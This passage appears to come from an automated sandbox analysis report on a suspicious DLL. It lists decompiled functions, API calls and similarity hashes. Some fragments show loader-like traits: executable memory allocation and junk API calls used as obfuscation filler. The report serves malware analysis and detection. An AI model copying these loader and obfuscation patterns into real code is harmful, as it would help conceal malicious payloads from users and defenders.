                                                                                                                                    0x10002bc6
                                                                                                                                    0x10002bc6
                                                                                                                                    0x10002bd0
                                                                                                                                    0x10002bd2
                                                                                                                                    0x10002bd8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002bd8
                                                                                                                                    0x10002b92
                                                                                                                                    0x10002bda
                                                                                                                                    0x10002be1
                                                                                                                                    0x10002be2
                                                                                                                                    0x10002be3
                                                                                                                                    0x10002bf3

                                                                                                                                    APIs
                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001E3C,00003000,00000040), ref: 100027D6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID: Erodium
                                                                                                                                    • API String ID: 4275171209-1155451227
                                                                                                                                    • Opcode ID: 97ef0320dc4bb16d87dc74a1437d1f0f39f06b34618ba54a91317ffb8219f6f9
                                                                                                                                    • Instruction ID: 35d30773ef3168207c4a7e23db3de7a99f47d43d62763af8d473a69d80a2f7a0
                                                                                                                                    • Opcode Fuzzy Hash: 97ef0320dc4bb16d87dc74a1437d1f0f39f06b34618ba54a91317ffb8219f6f9
                                                                                                                                    • Instruction Fuzzy Hash: 3BC1ED759052E28BF314CF28CCD03693BA1F7943D0F54852AC985AB3AED7B99D81CB52
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E10004445(intOrPtr _a4) {
                                                                                                                                    				void* _t6;
                                                                                                                                    				intOrPtr _t7;
                                                                                                                                    				void* _t10;
                                                                                                                                    
                                                                                                                                    				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                    				 *0x1000f594 = _t6;
                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                    					_t7 = E100043EA(__eflags);
                                                                                                                                    					__eflags = _t7 - 3;
                                                                                                                                    					 *0x1000fb80 = _t7;
                                                                                                                                    					if(_t7 != 3) {
                                                                                                                                    						L5:
                                                                                                                                    						__eflags = 1;
                                                                                                                                    						return 1;
                                                                                                                                    					} else {
                                                                                                                                    						_t10 = E10005DE8(0x3f8);
                                                                                                                                    						__eflags = _t10;
                                                                                                                                    						if(_t10 != 0) {
                                                                                                                                    							goto L5;
                                                                                                                                    						} else {
                                                                                                                                    							HeapDestroy( *0x1000f594);
                                                                                                                                    							 *0x1000f594 =  *0x1000f594 & 0x00000000;
                                                                                                                                    							goto L1;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					L1:
                                                                                                                                    					return 0;
                                                                                                                                    				}
                                                                                                                                    			}







                                                                                                                                    APIs
                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,10002F90,00000001,?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C), ref: 10004456
                                                                                                                                    • HeapDestroy.KERNEL32(?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C,100031C8,?), ref: 1000448C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$CreateDestroy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3296620671-0
                                                                                                                                    • Opcode ID: 064172fa8dc419076757cafe7ee1cc7a72132e51f9dbf521579e7f1264d808c8
                                                                                                                                    • Instruction ID: cf8fcad55ee25d0691a6aa256800d2603331258143bc29d739b87b307630a09c
                                                                                                                                    • Opcode Fuzzy Hash: 064172fa8dc419076757cafe7ee1cc7a72132e51f9dbf521579e7f1264d808c8
                                                                                                                                    • Instruction Fuzzy Hash: F6E092B5659352EEF704EF308D4A72636D4E7447C7F02883AF908C50ACEFB08940B605
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                    			E100019C0(void* __ebp) {
                                                                                                                                    				signed int _v4;
                                                                                                                                    				short _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				char _v16;
                                                                                                                                    				char _v20;
                                                                                                                                    				char _v24;
                                                                                                                                    				char _v34;
                                                                                                                                    				short _v36;
                                                                                                                                    				char _v40;
                                                                                                                                    				intOrPtr _v44;
                                                                                                                                    				char _v48;
                                                                                                                                    				struct tagRECT _v64;
                                                                                                                                    				struct tagRECT _v80;
                                                                                                                                    				struct tagRECT _v96;
                                                                                                                                    				void* __edi;
                                                                                                                                    				signed int _t18;
                                                                                                                                    				intOrPtr _t20;
                                                                                                                                    				char _t21;
                                                                                                                                    				char _t24;
                                                                                                                                    				intOrPtr _t25;
                                                                                                                                    				char _t31;
                                                                                                                                    				void* _t40;
                                                                                                                                    				void* _t41;
                                                                                                                                    				char _t44;
                                                                                                                                    				char _t46;
                                                                                                                                    				signed int _t52;
                                                                                                                                    				char _t53;
                                                                                                                                    				intOrPtr _t55;
                                                                                                                                    				char _t56;
                                                                                                                                    				intOrPtr _t60;
                                                                                                                                    				void* _t61;
                                                                                                                                    				void* _t62;
                                                                                                                                    				void* _t63;
                                                                                                                                    				long* _t66;
                                                                                                                                    				void* _t69;
                                                                                                                                    
                                                                                                                                    				_t63 = __ebp;
                                                                                                                                    				_t18 =  *0x1000e420; // 0x44ea7bf2
                                                                                                                                    				_v4 = _t18 ^ _t66;
                                                                                                                                    				if( *0x1000e350 == 0x1652) {
                                                                                                                                    					_t53 = "potasto32"; // 0x61746f70
                                                                                                                                    					_t44 = "leCapotasto32"; // 0x6143656c
                                                                                                                                    					_t24 = "EnableCapotasto32"; // 0x62616e45
                                                                                                                                    					_v16 = _t53;
                                                                                                                                    					_v20 = _t44;
                                                                                                                                    					_v24 = _t24;
                                                                                                                                    					_t25 =  *0x1000a1ac; // 0x336f7473
                                                                                                                                    					_v12 = _t25;
                                                                                                                                    					_v8 =  *0x1000a1b0 & 0x0000ffff;
                                                                                                                                    					__imp__CertOpenSystemStoreA(0x1000e108,  &_v24);
                                                                                                                                    					EqualSid(0x1000e106, 0x1000e106);
                                                                                                                                    					FlushFileBuffers(0x1000e106);
                                                                                                                                    					GetWindowThreadProcessId(0x1000e104, 0x1000e106);
                                                                                                                                    					ReleaseSemaphore(0x1000e2d4, 0x1000e104, _t66);
                                                                                                                                    					_t31 = "adrace"; // 0x61726461
                                                                                                                                    					_t46 = "RemoveHeadrace"; // 0x6f6d6552
                                                                                                                                    					_t55 = M1000A194; // 0x65486576
                                                                                                                                    					_v40 = _t31;
                                                                                                                                    					_v48 = _t46;
                                                                                                                                    					_v44 = _t55;
                                                                                                                                    					_t56 =  *0x1000a19e; // 0x0
                                                                                                                                    					_v36 =  *0x1000a19c & 0x0000ffff;
                                                                                                                                    					_v34 = _t56;
                                                                                                                                    					LoadBitmapA(0x1000e104,  &_v48);
                                                                                                                                    					ScrollDC(0x1000e2d4,  *0x1000e2d4,  *0x1000e2d4,  &_v64,  &_v80, 0x1000e104,  &_v96);
                                                                                                                                    					SetScrollPos(0x1000e2d4,  *0x1000e108,  *0x1000e2d4, 0x1000e2d4);
                                                                                                                                    					HeapDestroy(0x1000e108);
                                                                                                                                    					ReadFile(0x1000e108, 0x1000e2d4,  *0x1000e2d4, 0x1000e2d4, 0x1000e2d4);
                                                                                                                                    				}
                                                                                                                                    				_t20 =  *0x1000e39c; // 0xd3
                                                                                                                                    				if(_t20 <  *0x1000de8c) {
                                                                                                                                    					 *0x1000de7c = 0x266;
                                                                                                                                    				}
                                                                                                                                    				_t69 =  *0x1000e364 - _t20; // 0x47
                                                                                                                                    				if(_t69 < 0) {
                                                                                                                                    					 *0x1000e07d = 0x46;
                                                                                                                                    				}
                                                                                                                                    				_t52 =  *0x1000dfcc & 0x0000ffff;
                                                                                                                                    				_t21 =  *0x1000e07e;
                                                                                                                                    				_push(_t63);
                                                                                                                                    				_t60 =  *0x1000e100; // 0x167
                                                                                                                                    				_t41 = 0xa6;
                                                                                                                                    				while(_t52 >= 0xcea || _t41 >= 0x164 && _t21 >= _t60) {
                                                                                                                                    					_t21 = _t21 - 1;
                                                                                                                                    					_t41 = _t41 - 0x7a;
                                                                                                                                    					 *0x1000e0c4 = 0x50;
                                                                                                                                    					 *0x1000e3a4 = 0x98;
                                                                                                                                    					_t52 = _t52 - 1;
                                                                                                                                    				}
                                                                                                                                    				_pop(_t61);
                                                                                                                                    				return E10002ECD(0xa17, _t40, _v4 ^ _t66, _t52, _t61, _t62);
                                                                                                                                    			}






































                                                                                                                                    0x10001b37
                                                                                                                                    0x10001b39
                                                                                                                                    0x10001b39
                                                                                                                                    0x10001b40
                                                                                                                                    0x10001b47
                                                                                                                                    0x10001b4e
                                                                                                                                    0x10001b50
                                                                                                                                    0x10001b57
                                                                                                                                    0x10001b60
                                                                                                                                    0x10001b75
                                                                                                                                    0x10001b78
                                                                                                                                    0x10001b7b
                                                                                                                                    0x10001b82
                                                                                                                                    0x10001b8c
                                                                                                                                    0x10001b8c
                                                                                                                                    0x10001b95
                                                                                                                                    0x10001ba6

                                                                                                                                    APIs
                                                                                                                                    • CertOpenSystemStoreA.CRYPT32(1000E108,?), ref: 10001A1A
                                                                                                                                    • EqualSid.ADVAPI32(1000E106,1000E106), ref: 10001A2A
                                                                                                                                    • FlushFileBuffers.KERNEL32(1000E106), ref: 10001A35
                                                                                                                                    • GetWindowThreadProcessId.USER32(1000E104,1000E106), ref: 10001A45
                                                                                                                                    • ReleaseSemaphore.KERNEL32(1000E2D4,1000E104,00000000), ref: 10001A59
                                                                                                                                    • LoadBitmapA.USER32 ref: 10001A9C
                                                                                                                                    • ScrollDC.USER32 ref: 10001AC4
                                                                                                                                    • SetScrollPos.USER32 ref: 10001AE4
                                                                                                                                    • HeapDestroy.KERNEL32(1000E108,?,1000E2D4), ref: 10001AEF
                                                                                                                                    • ReadFile.KERNEL32(1000E108,1000E2D4,?,1000E2D4,1000E2D4,?,1000E2D4), ref: 10001B11
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileScroll$BitmapBuffersCertDestroyEqualFlushHeapLoadOpenProcessReadReleaseSemaphoreStoreSystemThreadWindow
                                                                                                                                    • String ID: EnableCapotasto32$RemoveHeadrace
                                                                                                                                    • API String ID: 4228436720-2533295656
                                                                                                                                    • Opcode ID: 9bed4bca3679bbabb76dec61235da76683930cca1fa985c0e6fe0bf4c56d325c
                                                                                                                                    • Instruction ID: aa9cf5a43dbb99cac99c69c5b064df1b281807df25892426c95c19d4ebe6aa60
                                                                                                                                    • Opcode Fuzzy Hash: 9bed4bca3679bbabb76dec61235da76683930cca1fa985c0e6fe0bf4c56d325c
                                                                                                                                    • Instruction Fuzzy Hash: 704148710082A1AEF300EF54CCD88EA7BF9FB8A3C1F404519F655A226CE3B59984CB13
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                    			E10002ECD(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                    				intOrPtr _v0;
                                                                                                                                    				void* _v804;
                                                                                                                                    				intOrPtr _v808;
                                                                                                                                    				intOrPtr _v812;
                                                                                                                                    				intOrPtr _t6;
                                                                                                                                    				intOrPtr _t11;
                                                                                                                                    				intOrPtr _t12;
                                                                                                                                    				intOrPtr _t13;
                                                                                                                                    				long _t17;
                                                                                                                                    				intOrPtr _t21;
                                                                                                                                    				intOrPtr _t22;
                                                                                                                                    				intOrPtr _t25;
                                                                                                                                    				intOrPtr _t26;
                                                                                                                                    				intOrPtr _t27;
                                                                                                                                    				intOrPtr* _t31;
                                                                                                                                    				void* _t34;
                                                                                                                                    
                                                                                                                                    				_t27 = __esi;
                                                                                                                                    				_t26 = __edi;
                                                                                                                                    				_t25 = __edx;
                                                                                                                                    				_t22 = __ecx;
                                                                                                                                    				_t21 = __ebx;
                                                                                                                                    				_t6 = __eax;
                                                                                                                                    				_t34 = _t22 -  *0x1000e420; // 0x44ea7bf2
                                                                                                                                    				if(_t34 == 0) {
                                                                                                                                    					asm("repe ret");
                                                                                                                                    				}
                                                                                                                                    				 *0x1000f210 = _t6;
                                                                                                                                    				 *0x1000f20c = _t22;
                                                                                                                                    				 *0x1000f208 = _t25;
                                                                                                                                    				 *0x1000f204 = _t21;
                                                                                                                                    				 *0x1000f200 = _t27;
                                                                                                                                    				 *0x1000f1fc = _t26;
                                                                                                                                    				 *0x1000f228 = ss;
                                                                                                                                    				 *0x1000f21c = cs;
                                                                                                                                    				 *0x1000f1f8 = ds;
                                                                                                                                    				 *0x1000f1f4 = es;
                                                                                                                                    				 *0x1000f1f0 = fs;
                                                                                                                                    				 *0x1000f1ec = gs;
                                                                                                                                    				asm("pushfd");
                                                                                                                                    				_pop( *0x1000f220);
                                                                                                                                    				 *0x1000f214 =  *_t31;
                                                                                                                                    				 *0x1000f218 = _v0;
                                                                                                                                    				 *0x1000f224 =  &_a4;
                                                                                                                                    				 *0x1000f160 = 0x10001;
                                                                                                                                    				_t11 =  *0x1000f218; // 0x0
                                                                                                                                    				 *0x1000f114 = _t11;
                                                                                                                                    				 *0x1000f108 = 0xc0000409;
                                                                                                                                    				 *0x1000f10c = 1;
                                                                                                                                    				_t12 =  *0x1000e420; // 0x44ea7bf2
                                                                                                                                    				_v812 = _t12;
                                                                                                                                    				_t13 =  *0x1000e424; // 0xbb15840d
                                                                                                                                    				_v808 = _t13;
                                                                                                                                    				 *0x1000f158 = IsDebuggerPresent();
                                                                                                                                    				_push(1);
                                                                                                                                    				E1000492A(_t14);
                                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                                    				_t17 = UnhandledExceptionFilter(0x1000a24c);
                                                                                                                                    				if( *0x1000f158 == 0) {
                                                                                                                                    					_push(1);
                                                                                                                                    					E1000492A(_t17);
                                                                                                                                    				}
                                                                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                    			}




















                                                                                                                                    APIs
                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 10003285
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1000329A
                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(1000A24C), ref: 100032A5
                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 100032C1
                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 100032C8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                    • Opcode ID: 1a3639aa3dba0f344c431cb2b16e074ceffaa10fc190f9430ec11a68cc25475a
                                                                                                                                    • Instruction ID: 1b95a328b90afb3d0908e15443ddadbd3c70359556c32ac8b068be8f95e04966
                                                                                                                                    • Opcode Fuzzy Hash: 1a3639aa3dba0f344c431cb2b16e074ceffaa10fc190f9430ec11a68cc25475a
                                                                                                                                    • Instruction Fuzzy Hash: F721D2B9800225DFF700DF14D8C46A43BE4FB093D4F50411EE90893A69EBB45A84AF59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E100039D0(void* __ebx, void* __edx) {
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				_Unknown_base(*)()* _t7;
                                                                                                                                    				long _t10;
                                                                                                                                    				void* _t11;
                                                                                                                                    				int _t12;
                                                                                                                                    				void* _t18;
                                                                                                                                    				intOrPtr _t21;
                                                                                                                                    				long _t26;
                                                                                                                                    				void* _t30;
                                                                                                                                    				void* _t37;
                                                                                                                                    				struct HINSTANCE__* _t38;
                                                                                                                                    				void* _t41;
                                                                                                                                    				void* _t43;
                                                                                                                                    
                                                                                                                                    				_t37 = __edx;
                                                                                                                                    				_t30 = __ebx;
                                                                                                                                    				_t38 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                    					 *0x1000f474 = GetProcAddress(_t38, "FlsAlloc");
                                                                                                                                    					 *0x1000f478 = GetProcAddress(_t38, "FlsGetValue");
                                                                                                                                    					 *0x1000f47c = GetProcAddress(_t38, "FlsSetValue");
                                                                                                                                    					_t7 = GetProcAddress(_t38, "FlsFree");
                                                                                                                                    					__eflags =  *0x1000f474;
                                                                                                                                    					_t41 = TlsSetValue;
                                                                                                                                    					 *0x1000f480 = _t7;
                                                                                                                                    					if( *0x1000f474 == 0) {
                                                                                                                                    						L6:
                                                                                                                                    						 *0x1000f478 = TlsGetValue;
                                                                                                                                    						 *0x1000f474 = E10003687;
                                                                                                                                    						 *0x1000f47c = _t41;
                                                                                                                                    						 *0x1000f480 = TlsFree;
                                                                                                                                    					} else {
                                                                                                                                    						__eflags =  *0x1000f478;
                                                                                                                                    						if( *0x1000f478 == 0) {
                                                                                                                                    							goto L6;
                                                                                                                                    						} else {
                                                                                                                                    							__eflags =  *0x1000f47c;
                                                                                                                                    							if( *0x1000f47c == 0) {
                                                                                                                                    								goto L6;
                                                                                                                                    							} else {
                                                                                                                                    								__eflags = _t7;
                                                                                                                                    								if(_t7 == 0) {
                                                                                                                                    									goto L6;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					_t10 = TlsAlloc();
                                                                                                                                    					__eflags = _t10 - 0xffffffff;
                                                                                                                                    					 *0x1000e430 = _t10;
                                                                                                                                    					if(_t10 == 0xffffffff) {
                                                                                                                                    						L15:
                                                                                                                                    						_t11 = 0;
                                                                                                                                    						__eflags = 0;
                                                                                                                                    					} else {
                                                                                                                                    						_t12 = TlsSetValue(_t10,  *0x1000f478);
                                                                                                                                    						__eflags = _t12;
                                                                                                                                    						if(_t12 == 0) {
                                                                                                                                    							goto L15;
                                                                                                                                    						} else {
                                                                                                                                    							E1000356C();
                                                                                                                                    							 *0x1000f474 = E100035B8( *0x1000f474);
                                                                                                                                    							 *0x1000f478 = E100035B8( *0x1000f478);
                                                                                                                                    							 *0x1000f47c = E100035B8( *0x1000f47c);
                                                                                                                                    							 *0x1000f480 = E100035B8( *0x1000f480);
                                                                                                                                    							_t18 = E10004B0B();
                                                                                                                                    							__eflags = _t18;
                                                                                                                                    							if(_t18 == 0) {
                                                                                                                                    								L14:
                                                                                                                                    								E100036BA();
                                                                                                                                    								goto L15;
                                                                                                                                    							} else {
                                                                                                                                    								_push(E10003846);
                                                                                                                                    								_t21 =  *((intOrPtr*)(E10003624( *0x1000f474)))();
                                                                                                                                    								__eflags = _t21 - 0xffffffff;
                                                                                                                                    								 *0x1000e42c = _t21;
                                                                                                                                    								if(_t21 == 0xffffffff) {
                                                                                                                                    									goto L14;
                                                                                                                                    								} else {
                                                                                                                                    									_t43 = E10003C22(1, 0x214);
                                                                                                                                    									__eflags = _t43;
                                                                                                                                    									if(_t43 == 0) {
                                                                                                                                    										goto L14;
                                                                                                                                    									} else {
                                                                                                                                    										_push(_t43);
                                                                                                                                    										_push( *0x1000e42c);
                                                                                                                                    										__eflags =  *((intOrPtr*)(E10003624( *0x1000f47c)))();
                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                    											goto L14;
                                                                                                                                    										} else {
                                                                                                                                    											_push(0);
                                                                                                                                    											_push(_t43);
                                                                                                                                    											E100036F7(_t30, _t37, _t38, _t43, __eflags);
                                                                                                                                    											_t26 = GetCurrentThreadId();
                                                                                                                                    											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
                                                                                                                                    											 *_t43 = _t26;
                                                                                                                                    											_t11 = 1;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					return _t11;
                                                                                                                                    				} else {
                                                                                                                                    					E100036BA();
                                                                                                                                    					return 0;
                                                                                                                                    				}
                                                                                                                                    			}


















                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10002F9E,?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C,100031C8,?), ref: 100039D6
                                                                                                                                    • __mtterm.LIBCMT ref: 100039E2
                                                                                                                                      • Part of subcall function 100036BA: __decode_pointer.LIBCMT ref: 100036CB
                                                                                                                                      • Part of subcall function 100036BA: TlsFree.KERNEL32(00000020,1000303A,?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C,100031C8,?), ref: 100036E5
                                                                                                                                      • Part of subcall function 100036BA: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,1000303A,?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C), ref: 10004B6F
                                                                                                                                      • Part of subcall function 100036BA: DeleteCriticalSection.KERNEL32(00000020,?,00000001,1000303A,?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C,100031C8), ref: 10004B99
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 100039F8
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10003A05
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10003A12
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10003A1F
                                                                                                                                    • TlsAlloc.KERNEL32(?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C,100031C8,?), ref: 10003A6F
                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C,100031C8,?), ref: 10003A8A
                                                                                                                                    • __init_pointers.LIBCMT ref: 10003A94
                                                                                                                                    • __encode_pointer.LIBCMT ref: 10003A9F
                                                                                                                                    • __encode_pointer.LIBCMT ref: 10003AAF
                                                                                                                                    • __encode_pointer.LIBCMT ref: 10003ABF
                                                                                                                                    • __encode_pointer.LIBCMT ref: 10003ACF
                                                                                                                                    • __decode_pointer.LIBCMT ref: 10003AF0
                                                                                                                                    • __calloc_crt.LIBCMT ref: 10003B09
                                                                                                                                    • __decode_pointer.LIBCMT ref: 10003B23
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 10003B39
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                    • API String ID: 4287529916-3819984048
                                                                                                                                    • Opcode ID: b4d1ead4c33f6033c1096739a0aa6af20c33ea56c78c274fed75c4ecccc6c432
                                                                                                                                    • Instruction ID: 0bf447cf4964569eb9da356a023b523573ed09149bcc9166d4cd5bd92e3c38de
                                                                                                                                    • Opcode Fuzzy Hash: b4d1ead4c33f6033c1096739a0aa6af20c33ea56c78c274fed75c4ecccc6c432
                                                                                                                                    • Instruction Fuzzy Hash: A3318230804320AAF712EF798C85A2B7BADEB057D5F11862EE950D36BDDB359444EB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                    			E100036F7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                    				struct HINSTANCE__* _t20;
                                                                                                                                    				intOrPtr _t24;
                                                                                                                                    				intOrPtr _t28;
                                                                                                                                    				intOrPtr _t40;
                                                                                                                                    				void* _t41;
                                                                                                                                    
                                                                                                                                    				_push(0xc);
                                                                                                                                    				_push(0x1000b3d0);
                                                                                                                                    				E100046A0(__ebx, __edi, __esi);
                                                                                                                                    				_t20 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                                    				 *(_t41 - 0x1c) = _t20;
                                                                                                                                    				_t40 =  *((intOrPtr*)(_t41 + 8));
                                                                                                                                    				 *((intOrPtr*)(_t40 + 0x5c)) = 0x1000e460;
                                                                                                                                    				 *((intOrPtr*)(_t40 + 0x14)) = 1;
                                                                                                                                    				if(_t20 != 0) {
                                                                                                                                    					 *((intOrPtr*)(_t40 + 0x1f8)) = GetProcAddress(_t20, "EncodePointer");
                                                                                                                                    					 *((intOrPtr*)(_t40 + 0x1fc)) = GetProcAddress( *(_t41 - 0x1c), "DecodePointer");
                                                                                                                                    				}
                                                                                                                                    				 *((intOrPtr*)(_t40 + 0x70)) = 1;
                                                                                                                                    				 *((char*)(_t40 + 0xc8)) = 0x43;
                                                                                                                                    				 *((char*)(_t40 + 0x14b)) = 0x43;
                                                                                                                                    				 *(_t40 + 0x68) = 0x1000e950;
                                                                                                                                    				InterlockedIncrement(0x1000e950);
                                                                                                                                    				E10004C81(0xc);
                                                                                                                                    				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                                                                                    				_t24 =  *((intOrPtr*)(_t41 + 0xc));
                                                                                                                                    				 *((intOrPtr*)(_t40 + 0x6c)) = _t24;
                                                                                                                                    				if(_t24 == 0) {
                                                                                                                                    					_t28 =  *0x1000e940; // 0x1000e868
                                                                                                                                    					 *((intOrPtr*)(_t40 + 0x6c)) = _t28;
                                                                                                                                    				}
                                                                                                                                    				_push( *((intOrPtr*)(_t40 + 0x6c)));
                                                                                                                                    				E10005511();
                                                                                                                                    				 *(_t41 - 4) = 0xfffffffe;
                                                                                                                                    				return E100046E5(E100037A2());
                                                                                                                                    			}









                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,1000B3D0,0000000C,10003809,00000000,00000000,?,10003BEF,?,00000001,00000001,10004C0B,00000018,1000B458,0000000C,10004C9A), ref: 10003708
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10003731
                                                                                                                                    • GetProcAddress.KERNEL32(?,DecodePointer), ref: 10003741
                                                                                                                                    • InterlockedIncrement.KERNEL32(1000E950), ref: 10003763
                                                                                                                                    • __lock.LIBCMT ref: 1000376B
                                                                                                                                    • ___addlocaleref.LIBCMT ref: 1000378A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp
